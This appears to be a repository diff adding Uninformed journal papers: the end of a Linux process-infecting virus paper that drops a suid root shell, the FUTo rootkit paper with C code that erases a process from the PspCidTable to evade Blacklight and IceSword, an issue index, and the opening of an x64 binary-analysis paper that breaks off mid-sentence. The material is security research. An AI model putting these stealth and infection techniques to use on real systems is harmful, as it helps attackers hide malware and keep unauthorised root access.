The virus assembly parts were written as one chunk, the pre-virus
code is located in the top and the virus code in the bottom. It is
also written in shellcode programming style, which produces a NULL
free and somewhat optimized code. As this chunk has been injected
into the infected process, it keeps the virus as small as possible,
which always is a good idea.
The virus code assumes it will run more than once inside a given
infected process. This means that self modifying code actions such
as fixing NULLs in runtime, first checks if it is needed in the
current virus iteration.
The virus itself is programmed to drop a suid shell called
/tmp/fluffy. Before doing so, it will check if the file
exists, and if that is not the case, it will execve() a
small hardcoded shell script to generate a suid wrapper. Iteration
occurs every 14 secs.
The signal() syscall has a habit of restarting the signal handler to
default after it has been called. This means the virus has to
re-register to the signal every time. An alternative solution is to
setup the signal handler using other signal related syscalls such as
sigaction() or rtsigaction() which is how the libc signal() function
is implemented. Choosing signal() over these syscalls was based on
size related issues.
5.3) Further Design Issues
Aside of what concerns the code itself:
Injecting to the previous stack page top address is a safety move to
assure the virus code won't overwrite any program related data on
the stack. Testing the virus on the syslogd daemon showed that this
make sense, as the syslogd at some point managed to partly overwrite
the virus code. A common pitfall is NULLs, as two NULLs overwrite
(e.g. \x00\x00) creates a valid assembly instruction ADD AL,(EAX)
which easily leads to a crash.
Apart from the stack it is possible to inject the code to the .text
section itself. As on x86IA32, pages are 4k aligned and the program
code itself might not fill up the entire page. The gap created often
is referred to as "cave", and it is an ideal place to park the virus
assuming of course the virus is small enough to get into it. But due
to nature of the .text section, which is not writable, the
virus will require to issue mprotect() on the current page
to perform self modifying actions on itself.
An easy way to find a suitable process to infect using an automatic
approach, would be to start an attachment loop starting from the pid
zero and onward. As the system boots and enters init 3 (e.g.
multiuser) a series of daemons are being launched. Due to the timing
of these daemons, their pids would be closer to zero, an example for
such would be crond, syslogd and inetd.
6) Conclusion
Implementation of a userland scheduler code allows to run an external
code in a perfect harmony with the existing code. Taking an exploit
scenario from any kind and adding this feature to it, can turn a normal
straight forward shellcode to a backdoor and more.
References:
[1] Building ptrace Injecting Shellcodes
anonymous
http://www.phrack.org/show.php?p=59&a=12;
accessed December 29, 2005.

379
uninformed/3.6.txt Normal file
View File

@ -0,0 +1,379 @@
FUTo
Peter Silberman & C.H.A.O.S.
1) Foreword
Abstract:
Since the introduction of FU, the rootkit world has moved away from
implementing system hooks to hide their presence. Because of this change
in offense, a new defense had to be developed. The new algorithms used
by rootkit detectors, such as BlackLight, attempt to find what the
rootkit is hiding instead of simply detecting the presence of the
rootkit's hooks. This paper will discuss an algorithm that is used by
both Blacklight and IceSword to detect hidden processes. This paper will
also document current weaknesses in the rootkit detection field and
introduce a more complete stealth technique implemented as a prototype
in FUTo.
Thanks:
Peter would like to thank bugcheck, skape, thief, pedram, F-Secure for
doing great research, and all the nologin/research'ers who encourage
mind growth.
C.H.A.O.S. would like to thank Amy, Santa (this work was three hours on
Christmas day), lonerancher, Pedram, valerino, and HBG Unit.
2) Introduction
In the past year or two, there have been several major developments in
the rootkit world. Recent milestones include the introduction of the FU
rootkit, which uses Direct Kernel Object Manipulation (DKOM); the
introduction of VICE, one of the first rootkit detection programs; the
birth of Sysinternals' Rootkit Revealer and F-Secure's Blacklight, the
first mainstream Windows rootkit detection tools; and most recently the
introduction of Shadow Walker, a rootkit that hooks the memory manager
to hide in plain sight.
Enter Blacklight and IceSword. The authors chose to investigate the
algorithms used by both Blacklight and IceSword because they are
considered by many in the field to be the best detection tools.
Blacklight, developed by the Finnish security company F-Secure, is
primarily concerned with detecting hidden processes. It does not attempt
to detect system hooks; it is only concerned with hidden processes.
IceSword uses a very similar method to Blacklight. IceSword
differentiates itself from Blacklight in that it is a more robust tool
allowing the user to see what system calls are hooked, what drivers are
hidden, and what TCP/UDP ports are open that programs, such as netstat,
do not.
3) Blacklight
This paper will focus primarily on Blacklight due to its algorithm being
the research focus for this paper. Also, it became apparent after
researching Blacklight that IceSword used a very similiar algorithm.
Therefore, if a weakness was found in Blacklight, it would most likely
exist in IceSword as well.
Blacklight takes a userland approach to detecting processes. Although
simplistic, its algorithm is amazingly effective. Blacklight uses some
very strong anti-debugging features that begin by creating a Thread
Local Storage (TLS) callback table. Blacklight's TLS callback attempts
to befuddle debuggers by forking the main process before the process
object is fully created. This can occur because the TLS callback routine
is called before the process is completely initialized. Blacklight also
has anti-debugging measures that detect the presence of debuggers
attaching to it. Rather than attempting to beat the anti-debugging
measures by circumventing the TLS callback and making other program
modifications, the authors decided to just disable the TLS routine. To
do this, the authors used a tool called LordPE. LordPE allows users to
edit PE files. The authors used this tool to zero out the TLS callback
table. This disabled the forking routine and gave the authors the
ability to use an API Monitor. It should be noted that disabling the
callback routine would allow you to attach a debugger, but when the user
clicked "scan" in the Blacklight GUI Blacklight would detect the
debugger and exit. Instead of working up a second measure to circumvent
the anti-debugging routines, the authors decided to analyze the calls
occuring within Blacklight. To this end, the authors used Rohitabs API
Monitor.
In testing, one can see failed calls to the API OpenProcess (tls zero is
Blacklight without a TLS table). Blacklight tries opening a process with
process id (PID) of 0x1CC, 0x1D0, 0x1D4, 0x1D8 and so on. The authors
dubbed the method Blacklight uses as PID Bruteforce (PIDB). Blacklight
loops through all possible PIDS calling OpenProcess on the PIDs in the
range of 0x0 to 0x4E1C. Blacklight keeps a list of all processes it is
able to open, using the PIDB method. Blacklight then calls
CreateToolhelp32Snapshot, which gives Blacklight a second list of
processes. Blacklight then compares the two lists, to see if there are
any processes in the PIDB list that are not in the list returned by the
CreateToolhelp32Snapshot function. If there is any discrepancy, these
processes are considered hidden and reported to the user.
3.1) Windows OpenProcess
In Windows, the OpenProcess function is a wrapper to the NtOpenProcess
routine. NtOpenProcess is implemented in the kernel by NTOSKRNL.EXE. The
function prototype for NtOpenProcess is:
NTSTATUS NtOpenProcess (
OUT PHANDLE ProcessHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN PCLIENT_ID ClientId OPTIONAL);
The ClientId parameter is the actual PID that is passed by OpenProcess.
This parameter is optional, but during our observation the OpenProcess
function always specified a ClientId when calling NtOpenProcess.
NtOpenProcess performs three primary functions:
1. It verifies the process exists by calling PsLookupProcessByProcessId.
2. It attempts to open a handle to the process by calling
ObOpenObjectByPointer.
3. If it was successful opening a handle to the process, it passes the
handle back to the caller.
PsLookupProcessByProcessId was the next obvious place for research. One
of the outstanding questions was how does PsLookupProcessByProcessId
know that a given PID is part of a valid process? The answer becomes
clear in the first few lines of the disassembly:
PsLookupProcessByProcessId:
mov edi, edi
push ebp
mov ebp, esp
push ebx
push esi
mov eax, large fs:124h
push [ebp+arg_4]
mov esi, eax
dec dword ptr [esi+0D4h]
push PspCidTable
call ExMapHandleToPointer
From the above disassembly, it is clear that ExMapHandleToPointer
queries the PspCidTable for the process ID.
Now we have a complete picture of how Blacklight detects hidden processes:
1. Blacklight starts looping through the range of valid process IDs, 0
through 0x41DC.
2. Blacklight calls OpenProcess on every possible PID.
3. OpenProcess calls NtOpenProcess.
4. NtOpenProcess calls PsLookupProcessByProcessId to verify the
process exists.
5. PsLookupProcessByProcessId uses the PspCidTable to verify the
processes exists.
6. NtOpenProcess calls ObOpenObjectByPointer to get the handle to the
process.
7. If OpenProcess was successful, Blacklight stores the information
about the process and continues to loop.
8. Once the process list has been created by exhausting all possible
PIDs. Blacklight compares the PIDB list with the list it creates by
calling CreateToolhelp32Snapshot. CreateToolhelp32Snapshot is a Win32
API that takes a snapshot of all running processes on the system. A
discrepancy between the two lists implies that there is a hidden
process. This case is reported by Blacklight.
3.2) The PspCidTable
The PspCidTable is a "handle table for process and thread client IDs".
Every process' PID corresponds to its location in the PspCidTable. The
PspCidTable is a pointer to a HANDLE_TABLE structure.
typedef struct _HANDLE_TABLE {
PVOID p_hTable;
PEPROCESS QuotaProcess;
PVOID UniqueProcessId;
EX_PUSH_LOCK HandleTableLock [4];
LIST_ENTRY HandleTableList;
EX_PUSH_LOCK HandleContentionEvent;
PHANDLE_TRACE_DEBUG_INFO DebugInfo;
DWORD ExtraInfoPages;
DWORD FirstFree;
DWORD LastFree;
DWORD NextHandleNeedingPool;
DWORD HandleCount;
DWORD Flags;
};
Windows offers a variety of non-exported functions to manipulate and retrieve
information from the PspCidTable. These include:
- [ExCreateHandleTable] creates non-process handle tables. The
objects within all handle tables except the PspCidTable are pointers
to object headers and not the address of the objects themselves.
- [ExDupHandleTable] is called when spawning a process.
- [ExSweepHandleTable] is used for process rundown.
- [ExDestroyHandleTable] is called when a process is exiting.
- [ExCreateHandle] creates new handle table entries.
- [ExChangeHandle] is used to change the access mask on a handle.
- [ExDestroyHandle] implements the functionality of CloseHandle.
- [ExMapHandleToPointer] returns the address of the object corresponding to the handle.
- [ExReferenceHandleDebugIn] tracing handles.
- [ExSnapShotHandleTables] is used for handle searchers (for example in oh.exe).
Below is code that uses non-exported functions to remove a process
object from the PspCidTable. It uses hardcoded addresses for the
non-exported functions necessary; however, a rootkit could find these
function addresses dynamically.
typedef PHANDLE_TABLE_ENTRY (*ExMapHandleToPointerFUNC)
( IN PHANDLE_TABLE HandleTable,
IN HANDLE ProcessId);
void HideFromBlacklight(DWORD eproc)
{
PHANDLE_TABLE_ENTRY CidEntry;
ExMapHandleToPointerFUNC map;
ExUnlockHandleTableEntryFUNC umap;
PEPROCESS p;
CLIENT_ID ClientId;
map = (ExMapHandleToPointerFUNC)0x80493285;
CidEntry = map((PHANDLE_TABLE)0x8188d7c8,
LongToHandle( *((DWORD*)(eproc+PIDOFFSET)) ) );
if(CidEntry != NULL)
{
CidEntry->Object = 0;
}
return;
}
Since the job of the PspCidTable is to keep track of all the processes
and threads, it is logical that a rootkit detector could use the
PspCidTable to find hidden processes. However, relying on a single data
structure is not a very robust algorithm. If a rootkit alters this one
data structure, the operating system and other programs will have no
idea that the hidden process exists. New rootkit detection algorithms
should be devised that have overlapping dependencies so that a single
change will not go undetected.
4) FUTo
To demonstrate the weaknesses in the algorithms currently used by
rootkit detection software such as Blacklight and Icesword, the authors
have created FUTo. FUTo is a new version of the FU rootkit. FUTo has
the added ability to manipulate the PspCidTable without using any
function calls. It uses DKOM techniques to hide particular objects
within the PspCidTable.
There were some design considerations when implementing the new features
in FUTo. The first was that, like the ExMapHandleXXX functions, the
PspCidTable is not exported by the kernel. In order to overcome this,
FUTo automatically detects the PspCidTable by finding the
PsLookupProcessByProcessId function and disassembling it looking for the
first function call. At the time of this writing, the first function
call is always to ExMapHandleToPointer. ExMapHandleToPointer takes the
PspCidTable as its first parameter. Using this knowledge, it is fairly
straightforward to find the PspCidTable.
PsLookupProcessByProcessId:
mov edi, edi
push ebp
mov ebp, esp
push ebx
push esi
mov eax, large fs:124h
push [ebp+arg_4]
mov esi, eax
dec dword ptr [esi+0D4h]
push PspCidTable
call ExMapHandleToPointer
A more robust method to find the PspCidTable could be written as this
algorithm will fail if even simple compiler optimizations are made on
the kernel. Opc0de wrote a more robust method to detect non-exported
variables like PspCidTable, PspActiveProcessHead, PspLoadedModuleList,
etc. Opc0des method does not requires memory scanning like the method
currently used in FUTo. Instead Opc0de found that the KdVersionBlock
field in the Process Control Region structure pointed to a structure
KDDEBUGGER_DATA32. The structure looks like this:
typedef struct _KDDEBUGGER_DATA32 {
DBGKD_DEBUG_DATA_HEADER32 Header;
ULONG KernBase;
ULONG BreakpointWithStatus; // address of breakpoint
ULONG SavedContext;
USHORT ThCallbackStack; // offset in thread data
USHORT NextCallback; // saved pointer to next callback frame
USHORT FramePointer; // saved frame pointer
USHORT PaeEnabled:1;
ULONG KiCallUserMode; // kernel routine
ULONG KeUserCallbackDispatcher; // address in ntdll
ULONG PsLoadedModuleList;
ULONG PsActiveProcessHead;
ULONG PspCidTable;
ULONG ExpSystemResourcesList;
ULONG ExpPagedPoolDescriptor;
ULONG ExpNumberOfPagedPools;
[...]
ULONG KdPrintCircularBuffer;
ULONG KdPrintCircularBufferEnd;
ULONG KdPrintWritePointer;
ULONG KdPrintRolloverCount;
ULONG MmLoadedUserImageList;
} KDDEBUGGER_DATA32, *PKDDEBUGGER_DATA32;
As the reader can see the structure contains pointers to many of the
commonly needed/used non-exported variables. This is one more robust
method to finding the PspCidTable and other variables like it.
The second design consideration was a little more troubling. When FUTo
removes an object from the PspCidTable, the HANDLE_ENTRY is replaced with
NULLs representing the fact that the process "does not exist." The
problem then occurs when the process that is hidden (and has no
PspCidTable entries) is closed. When the system tries to close the
process, it will index into the PspCidTable and dereference a null
object causing a blue screen. The solution to this problem is simple but
not elegant. First, FUTo sets up a process notify routine by calling
PsSetCreateProcessNotifyRoutine. The callback function will be invoked
whenever a process is created, but more importantly it will be called
whenever a process is deleted. The callback executes before the hidden
process is terminated; therefore, it gets called before the system
crashes. When FUTo deletes the indexes that contain objects that point
to the rogue process, FUTo will save the value of the HANDLE_ENTRYs and
the index for later use. When the process is closed, FUTo will restore
the objects before the process is closed allowing the system to
dereference valid objects.
5) Conclusion
The catch phrase in 2005 was, ``We are raising the bar [again] for
rootkit detection''. Hopefully the reader has walked away with a better
understanding of how the top rootkit detection programs are detecting
hidden processes and how they can be improved. Some readers may ask
"What can I do?" Well, the simple solution is not to connect to the
Internet, but a combination of using both Blacklight, IceSword and
Rootkit Revealer will greatly help your chances of staying rootkit free.
A new tool called RAIDE (Rootkit Analysis Identification Elimination)
will be unveiled in the coming months at Blackhat Amsterdam. This new
tool does not suffer from the problems brought forth here.
Bibliography
Blacklight Homepage. F-Secure Blacklight
http://www.f-secure.com/blacklight/
FU Project Page. FU
http://www.rootkit.com/project.php?id=12
IceSword Homepage. IceSword
http://www.xfocus.net/tools/200505/1032.html
LordPE Homepage. LordPE Info
http://mitglied.lycos.de/yoda2k/LordPE/info.htm
Opc0de. 2005. How to get some hidden kernel variables without scanning
http://www.rootkit.com/newsread.php?newsid=101
Rohitabs API Monitor. API Monitor - Spy on API calls
http://www.rohitab.com/apimonitor/
Russinovich, Solomon. Microsoft Windows Internals Fourth Edition.
Silberman. RAIDE:Rootkit Analysis Identification Elimination
http://www.blackhat.com/html/bh-europe-06/bh-eu-06-speakers.htmlSilberman

35
uninformed/3.txt Normal file
View File

@ -0,0 +1,35 @@
Engineering in Reverse
Bypassing PatchGuard on Windows x64
skape & Skywing
The version of the Windows kernel that runs on the x64 platform has introduced a new feature, nicknamed PatchGuard, that is intended to prevent both malicious software and third-party vendors from modifying certain critical operating system structures. These structures include things like specific system images, the SSDT, the IDT, the GDT, and certain critical processor MSRs. This feature is intended to ensure kernel stability by preventing uncondoned behavior, such as hooking. However, it also has the side effect of preventing legitimate products from working properly. For that reason, this paper will serve as an in-depth analysis of PatchGuard's inner workings with an eye toward techniques that can be used to bypass it. Possible solutions will also be proposed for the bypass techniques that are suggested.
pdf | txt | html
Exploitation Technology
Windows Kernel-mode Payload Fundamentals
bugcheck & skape
This paper discusses the theoretical and practical implementations of kernel-mode payloads on Windows. At the time of this writing, kernel-mode research is generally regarded as the realm of a few, but it is hoped that documents such as this one will encourage a thoughtful progression of the subject matter. To that point, this paper will describe some of the general techniques and algorithms that may be useful when implementing kernel-mode payloads. Furthermore, the anatomy of a kernel-mode payload will be broken down into four distinct units, known as payload components, and explained in detail. In the end, the reader should walk away with a concrete understanding of the way in which kernel-mode payloads operate on Windows.
pdf | txt | html
Fuzzing
Analyzing Common Binary Parser Mistakes
Orlando Padilla
With just about one file format bug being consistently released on a weekly basis over the past six to twelve months, one can only hope developers would look and learn. The reality of it all is unfortunate; no one cares enough. These bugs have been around for some time now, but have only recently gained media attention due to the large number of vulnerabilities being released. Researchers have been finding more elaborate and passive attack vectors for these bugs, some of which can even leverage a remote compromise.
pdf | txt | code.tgz | html
General Research
Attacking NTLM with Precomputed Hashtables
Warlord
Breaking encrypted passwords has been of interest to hackers for a long time, and protecting them has always been one of the biggest security problems operating systems have faced, with Microsoft's Windows being no exception. Due to errors in the design of the password encryption scheme, especially in the LanMan(LM) scheme, Windows has a bad track in this field of information security. Especially in the last couple of years, where the outdated DES encryption algorithm that LanMan is based on faced more and more processing power in the average household, combined with ever increasing harddisk size, made it crystal clear that LanMan nowadays is not just outdated, but even antiquated.
pdf | txt | html
Linux Improvised Userland Scheduler Virus
Izik
This paper discusses the combination of a userland scheduler and runtime process infection for a virus. These two concepts complete each other. The runtime process infection opens the door to invading into other processes, and the userland scheduler provides a way to make the injected code coexist with the original process code. This allows the virus to remain stealthy and active inside an infected process.
pdf | txt | html
Rootkit Technology
FUTo
Peter Silberman & C.H.A.O.S.
Since the introduction of FU, the rootkit world has moved away from implementing system hooks to hide their presence. Because of this change in offense, a new defense had to be developed. The new algorithms used by rootkit detectors, such as BlackLight, attempt to find what the rootkit is hiding instead of simply detecting the presence of the rootkit's hooks. This paper will discuss an algorithm that is used by both Blacklight and IceSword to detect hidden processes. This paper will also document current weaknesses in the rootkit detection field and introduce a more complete stealth technique implemented as a prototype in FUTo.
pdf | txt | code.tgz | html

686
uninformed/4.4.txt Normal file
View File

@ -0,0 +1,686 @@
Improving Automated Analysis of Windows x64 Binaries
April 2006
skape
mmiller@hick.org
1) Foreword
Abstract: As Windows x64 becomes a more prominent platform, it will
become necessary to develop techniques that improve the binary analysis
process. In particular, automated techniques that can be performed
prior to doing code or data flow analysis can be useful in getting a
better understanding for how a binary operates. To that point, this
paper gives a brief explanation of some of the changes that have been
made to support Windows x64 binaries. From there, a few basic
techniques are illustrated that can be used to improve the process of
identifying functions, annotating their stack frames, and describing
their exception handler relationships. Source code to an example IDA
plugin is also included that shows how these techniques can be
implemented.
Thanks: The author would like to thank bugcheck, sh0k, jt, spoonm, and
Skywing.
Update: The article in MSDN magazine by Matt Pietrek was
published after this article was written. However, it contains a
lot of useful information and touches on many of the same topics
that this article covers in the background chapter. The article can
be found here:
http://msdn.microsoft.com/msdnmag/issues/06/05/x64/default.aspx.
With that, on with the show
2) Introduction
The demand for techniques that can be used to improve the analysis
process of Windows x64 binaries will only increase as the Windows x64
platform becomes more accepted and used in the market place. There is a
deluge of useful information surrounding techniques that can be used to
perform code and data flow analysis that is also applicable to the x64
architecture. However, techniques that can be used to better annotate
and streamline the initial analysis phases, such as identifying
functions and describing their stack frames, is still a ripe area for
improvement at the time of this writing. For that reason, this paper
will start by describing some of the changes that have been made to
support Windows x64 binaries. This background information is useful
because it serves as a basis for understanding a few basic techniques
that may be used to improve some of the initial analysis phases. During
the course of this paper, the term Windows x64 binary will simply be
reduced to x64 binary in the interest of brevity.
3) Background
Prior to diving into some of the analysis techniques that can be
performed on x64 binaries, it's first necessary to learn a bit about
some of the changes that were made to support the x64 architecture.
This chapter will give a very brief explanation of some of the things
that have been introduced, but will by no means attempt to act as an
authoritative reference.
3.1) PE32+ Image File Format
The image file format for the x64 platform is known as PE32+. As one
would expect, the file format is derived from the PE file format with
only very slight modifications. For instance, 64-bit binaries contain
an IMAGE_OPTIONAL_HEADER64 rather than an IMAGE_OPTIONAL_HEADER. The
differences between these two structures are described in the table
below:
Field | PE | PE32+
-------------------+-------+------------------------------
BaseOfData | ULONG | Removed from structure
ImageBase | ULONG | ULONGLONG
SizeOfStackReserve | ULONG | ULONGLONG
SizeOfStackCommit | ULONG | ULONGLONG
SizeOfHeapReserve | ULONG | ULONGLONG
SizeOfHeapCommit | ULONG | ULONGLONG
-------------------+-------+------------------------------
In general, any structure attribute in the PE image that made reference
to a 32-bit virtual address directly rather than through an RVA (Relative
Virtual Address) has been expanded to a 64-bit attribute in PE32+. Other
examples of this include the IMAGE_TLS_DIRECTORY structure and the
IMAGE_LOAD_CONFIG_DIRECTORY structure.
With the exception of certain field offsets in specific structures,
the PE32+ image file format is largely backward compatible with PE
both in use and in form.
3.2) Calling Convention
The calling convention used on x64 is much simpler than those used for
x86. Unlike x86, where calling conventions like stdcall, cdecl, and
fastcall are found, the x64 platform has only one calling convention.
The calling convention that it uses is a derivative of fastcall where
the first four parameters of a function are passed by register and any
remaining parameters are passed through the stack. Each parameter is 64
bits wide (8 bytes). The first four parameters are passed through the
RCX, RDX, R8, and R9 registers, respectively. For scenarios where
parameters are passed by value or are otherwise too large to fit into
one of the 64-bit registers, appropriate steps are taken as documented
in [4].
3.2.1) Stack Frame Layout
The stack frame layout for functions on x64 is very similar to x86, but
with a few key differences. Just like x86, the stack frame on x64 is
divided into three parts: parameters, return address, and locals. These
three parts are explained individually below. One of the important
principals to understand when it comes to x64 stack frames is that the
stack does not fluctuate throughout the course of a given function. In
fact, the stack pointer is only permitted to change in the context of a
function prologue. Note that things like alloca are handled in a special
manner[7]. Parameters are not pushed and popped from the stack. Instead,
stack space is pre-allocated for all of the arguments that would be
passed to child functions. This is done, in part, for making it easier
to unwind call stacks in the event of an exception. The table below
describes a typical stack frame:
+-------------------------+
| Stack parameter area |
+-------------------------+
| Register parameter area |
+-------------------------+
| Return address |
+-------------------------+
| Locals |
+-------------------------+
== Parameters
The calling convention for functions on x64 dictates that the first four
parameters are passed via register with any remaining parameters,
starting with parameter five, spilling to the stack. Given that the
fifth parameter is the first parameter passed by the stack, one would
think that the fifth parameter would be the value immediately adjacent
to the return address on the stack, but this is not the case. Instead,
if a given function calls other functions, that function is required to
allocate stack space for the parameters that are passed by register.
This has the affect of making it such that the area of the stack
immediately adjacent to the return address is 0x20 bytes of
uninitialized storage for the parameters passed by register followed
immediately by any parameters that spill to the stack (starting with
parameter five). The area of storage allocated on the stack for the
register parameters is known as the register parameter area whereas the
area of the stack for parameters that spill onto the stack is known as
the stack parameter area. The table below illustrates what the
parameter portion of a stack frame would look like after making a call
to a function:
+-------------------------+
| Parameter 6 |
+-------------------------+
| Parameter 5 |
+-------------------------+
| Parameter 4 (R9 Home) |
+-------------------------+
| Parameter 3 (R8 Home) |
+-------------------------+
| Parameter 2 (RDX Home) |
+-------------------------+
| Parameter 1 (RCX Home) |
+-------------------------+
| Return address |
+-------------------------+
To emphasize further, the register parameter area is always allocated,
even if the function being called has fewer than four arguments. This
area of the stack is effectively owned by the called function, and as
such can be used for volatile storage during the course of the function
call. In particular, this area is commonly used to persist the values
of register parameters. This area is also referred to as the ``home''
address for register parameters. However, it can also be used to save
non-volatile registers. To someone familiar with x86 it may seem
slightly odd to see functions modifying areas of the stack beyond the
return address. The key is to remember that the 0x20 bytes immediately
adjacent to the return address are owned by the called function. One
important side affect of this requirement is that if a function calls
other functions, the calling function's minimum stack allocation will be
0x20 bytes. This accounts for the register parameter area that will be
used by called functions.
The obvious question to ask at this point is why it's the caller's
responsibility to allocate stack space for use by the called function.
There are a few different reasons for this. Perhaps most importantly,
it makes it possible for the called function to take the address of a
parameter that's passed via a register. Furthermore, the address that
is returned for the parameter must be at a location that is contiguous
in relation to the other parameters. This is particularly necessary for
variadic functions, which require a contiguous list of parameters, but
may also be necessary for applications that make assumptions about being
able to reference parameters in relation to one another by address.
Invalidating this assumption would introduce source compatibility
problems.
For more information on parameter passing, refer to the MSDN
documentation[4,7].
== Return Address
Due to the fact that pointers are 64 bits wide on x64, the return
address location on the stack is eight bytes instead of four.
== Locals
The locals portion of a function's stack frame encompasses both local
variables and saved non-volatile registers. For x64, the general
purpose registers described as non-volatile are RBP, RBX, RDI, RSI, and
R12 through R15[5].
3.3) Exception Handling on x64
On x86, exception handling is accomplished through the adding and
removing of exception registration records on a per-thread basis. When
a function is entered that makes use of an exception handler, it
constructs an exception registration record on the stack that is
composed of an exception handler (a function pointer), and a pointer to
the next element in the exception handler list. This list of exception
registration records is stored relative to fs:[0]. When an exception
occurs, the exception dispatcher walks the list of exception handlers
and calls each one, checking to see if they are capable of handling the
exception that occurred. While this approach works perfectly fine,
Microsoft realized that there were better ways to go about it. First of
all, the adding and removing of exception registration records that are
static in the context of an execution path adds needless execution
overhead. Secondly, the security implications of storing a function
pointer on the stack have been made very obvious, especially in the case
where that function pointer can be called after an exception is
generated (such as an access violation). Finally, the process of
unwinding call frames is muddled with limitations, thus making it a more
complicated process than it might otherwise need to be[6].
With these things in mind, Microsoft completely revamped the way
exception handling is accomplished on x64. The major changes center
around the approaches Microsoft has taken to solve the three major
deficiencies found on x86. First, Microsoft solved the execution time
overhead issue of adding and removing exception handlers by moving all
of the static exception handling information into a static location in
the binary. This location, known as the .pdata section, is described by
the PE32+'s Exception Directory. The structure of this section will be
described in the exception directory subsection. By eliminating the
need to add and remove exception handlers on the fly, Microsoft has also
eliminated the security issue found on x86 with regard to overwriting
the function pointer of an exception handler. Perhaps most importantly,
the process involved in unwinding call frames has been drastically
improved through the formalization of the frame unwinding process. This
will be discussed in the subsection on unwind information.
3.3.1) Exception Directory
The Exception Directory of a PE32+ binary is used to convey the complete
list of functions that could be found in a stack frame during an unwind
operation. These functions are known as non-leaf functions, and they
are qualified as such if they either allocate space on the stack or call
other functions. The IMAGE_RUNTIME_FUNCTION_ENTRY data structure is used
to describe the non-leaf functions, as shown below[1]:
typedef struct _IMAGE_RUNTIME_FUNCTION_ENTRY {
ULONG BeginAddress;
ULONG EndAddress;
ULONG UnwindInfoAddress;
} _IMAGE_RUNTIME_FUNCTION_ENTRY, *_PIMAGE_RUNTIME_FUNCTION_ENTRY;
The BeginAddress and EndAddress attributes are RVAs that represent the
range of the non-leaf function. The UnwindInfoAddress will be discussed
in more detail in the following subsection on unwind information. The
Exception directory itself is merely an array of
IMAGE_RUNTIME_FUNCTION_ENTRY structures. When an exception occurs, the
exception dispatcher will enumerate the array of runtime function
entries until it finds the non-leaf function associated with the address
it's searching for (typically a return address).
3.3.2) Unwind Information
For the purpose of unwinding call frames and dispatching exceptions,
each non-leaf function has some non-zero amount of unwind information
associated with it. This association is made through the
UnwindInfoAddress attribute of the IMAGE_RUNTIME_FUNCTION_ENTRY
structure. The UnwindInfoAddress itself is an RVA that points to an
UNWIND_INFO structure which is defined as[8]:
typedef struct _UNWIND_INFO {
UBYTE Version : 3;
UBYTE Flags : 5;
UBYTE SizeOfProlog;
UBYTE CountOfCodes;
UBYTE FrameRegister : 4;
UBYTE FrameOffset : 4;
UNWIND_CODE UnwindCode[1];
/* UNWIND_CODE MoreUnwindCode[((CountOfCodes + 1) & ~1) - 1];
* union {
* OPTIONAL ULONG ExceptionHandler;
* OPTIONAL ULONG FunctionEntry;
* };
* OPTIONAL ULONG ExceptionData[]; */
} UNWIND_INFO, *PUNWIND_INFO;
This structure, at a very high level, describes a non-leaf function in
terms of its prologue size and frame register usage. Furthermore, it
describes the way in which the stack is set up when the prologue for
this non-leaf function is executed. This is provided through an array
of codes as accessed through the UnwindCode array. This array is
composed of UNWIND_CODE structures which are defined as[8]:
typedef union _UNWIND_CODE {
struct {
UBYTE CodeOffset;
UBYTE UnwindOp : 4;
UBYTE OpInfo : 4;
};
USHORT FrameOffset;
} UNWIND_CODE, *PUNWIND_CODE;
In order to properly unwind a frame, the exception dispatcher needs to
be aware of the amount of stack space allocated in that frame, the
locations of saved non-volatile registers, and anything else that has to
do with the stack. This information is necessary in order to be able to
restore the caller's stack frame when an unwind operation occurs. By
having the compiler keep track of this information at link time, it's
possible to emulate the unwind process by inverting the operations
described in the unwind code array for a given non-leaf function.
Aside from conveying stack frame set up, the UNWIND_INFO structure may
also describe exception handling information, such as the exception
handler that is to be called if an exception occurs. This information
is conveyed through the ExceptionHandler and ExceptionData attributes of
the structure which exist only if the UNW_FLAGE_HANDLER flag is set in the
Flags field.
For more details on the format and use of these structures for unwinding
as well as a complete description of the unwind process, please refer to
the MSDN documentation[2].
4) Analysis Techniques
In order to improve the analysis of x64 binaries, it is important to try
to identify techniques that can aide in the identification or extraction
of useful information from the binary in an automated fashion. This
chapter will focus on a handful of simple techniques that can be used to
better annotate or describe the behavior of an x64 binary. These
techniques intentionally do not cover the analysis of code or data flow
operations. Such techniques are outside of the scope of this paper.
4.1) Exception Directory Enumeration
Given the explanation of the Exception Directory found within PE32+
images and its application to the exception dispatching process, it can
be seen that x64 binaries have a lot of useful meta-information stored
within them. Given that this information is just sitting there waiting
to be used, it makes sense to try to take advantage of it in ways that
make it possible to better annotate or understand an x64 binary. The
following subsections will describe different things that can be
discovered by digging deeper into the contents of the exception
directory.
4.1.1) Functions
One of the most obvious uses for the information stored in the exception
directory is that it can be used to discover all of the non-leaf
functions in a binary. This is cool because it works regardless of
whether or not you actually have symbols for the binary, thus providing
an easy technique for identifying the majority of the functions in a
binary. The process taken to do this is to simply enumerate the array
of IMAGE_RUNTIME_FUNCTION_ENTRY structures stored within the exception
directory. The BeginAddress attribute of each entry marks the starting
point of a non-leaf function. There's a catch, though. Not all of the
runtime function entries are actually associated with the entry point of
a function. The fact of the matter is that entries can also be
associated with various portions of an actual function where stack
modifications are deferred until necessary. In these cases, the unwind
information associated with the runtime function entry is chained with
another runtime function entry.
The chaining of runtime function entries is documented as being
indicated through the UNW_FLAG_CHAININFO flag in the Flags attribute of
the UNWIND_INFO structure. If this flag is set, the area of memory
immediately following the last UNWIND_CODE in the UNWIND_INFO structure
is an IMAGE_RUNTIME_FUNCTION_ENTRY structure. The UnwindInfoAddress of
this structure indicates the chained unwind information. Aside from
this, chaining can also be indicated through an undocumented flag that
is stored in the least-significant bit of the UnwindInfoAddress. If the
least-significant bit is set, then it is implied that the runtime
function entry is directly chained to the IMAGE_RUNTIME_FUNCTION_ENTRY
structure that is found at the RVA conveyed by the UnwindInfoAddress
attribute with the least significant bit masked off. The reason
chaining can be indicated in this fashion is because it is a requirement
that unwind information be four byte aligned.
With chaining in mind, it is safe to assume that a runtime function
entry is associated with the entry point of a function if its unwind
information is not chained. This makes it possible to deterministically
identify the entry point of all of the non-leaf functions. From there,
it should be possible to identify all of the leaf functions through
calls that are made to them by non-leaf functions. This requires code
flow analysis, though.
4.1.2) Stack Frame Annotation
The unwind information associated with each non-leaf function
contains lots of useful meta-information about the structure of the
stack. It provides information about the amount of stack space
allocated, the location of saved non-volatile registers, and whether or
not a frame register is used and what relation it has to the rest of the
stack. This information is also described in terms of the location of
the instruction that actually performs the operation associated with the
